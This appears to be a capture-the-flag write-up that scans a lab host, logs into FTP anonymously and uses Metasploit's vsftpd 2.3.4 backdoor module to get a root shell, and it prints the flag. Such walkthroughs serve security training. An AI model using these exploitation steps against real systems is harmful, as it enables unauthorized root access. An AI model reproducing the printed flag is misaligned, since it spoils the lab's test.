FLAG1

5ee499eb5d0b8e4269b13483e57adaa0b3815f48

Enumeration

rustscan -a 10.150.150.12

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
22/tcp open  ssh     syn-ack

nmap -sC -sV 10.150.150.12

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.66.66.66
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation

ftp 10.150.150.12

Anonymous login allowed

Connected to 10.150.150.12.
220 Through the portal... - into nothingness or bliss?

Name (10.150.150.12:zyaire): Anonymous
331 Please specify the password.
Password:
230 Login successful.

Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.

But it seems like nothing is there

Simple Google search on vsftpd 2.0.8 and it will lead you to this website: https://www.hackingdna.com/2020/09/exploit-vsftpd-208.html

msfconsole

msf6 > search vsftpd

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.150.150.12

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.150.150.12:21 - Banner: 220 Through the portal... - into nothingness or bliss?
[*] 10.150.150.12:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

When you turn off the terminal of FTP successfully login, it cannot be exploited

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.150.150.12:21 - The port used by the backdoor bind listener is already open
[+] 10.150.150.12:21 - UID: uid=0(root) gid=0(root) groups=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.66.66.66:40627 -> 10.150.150.12:6200 ) at 2022-01-23 16:18:55 +0800

whoami
root

When you run it again with your another terminal with successful FTP login, you can gain access

Now get the root flag

cat FLAG1.txt
5ee499eb5d0b8e4269b13483e57adaa0b3815f48